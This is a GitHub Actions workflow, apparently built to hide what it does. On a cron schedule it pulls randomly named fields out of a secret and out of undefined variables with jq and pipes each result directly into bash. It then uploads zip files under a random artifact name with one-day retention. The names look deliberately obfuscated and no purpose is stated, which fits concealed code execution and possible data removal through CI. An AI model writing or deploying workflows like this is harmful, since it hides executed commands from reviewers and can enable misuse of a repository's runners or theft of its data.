name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '53 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          pgh51: ${{ secrets.pgh51 }}
        run: |
          printf '%s' "$pgh51" | jq -r .ct72234 | /bin/bash
          echo $tstqo257 | jq -r .tkix9 | /bin/bash
          echo $jqkij79 | jq -r .cd6 | /bin/bash
          echo $ckpe41 | jq -r .mq8 | /bin/bash
          printf '%s' "$kv98" | jq -r .rn50 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: AXQAVcma
          path: "*.zip"
          retention-days: 1
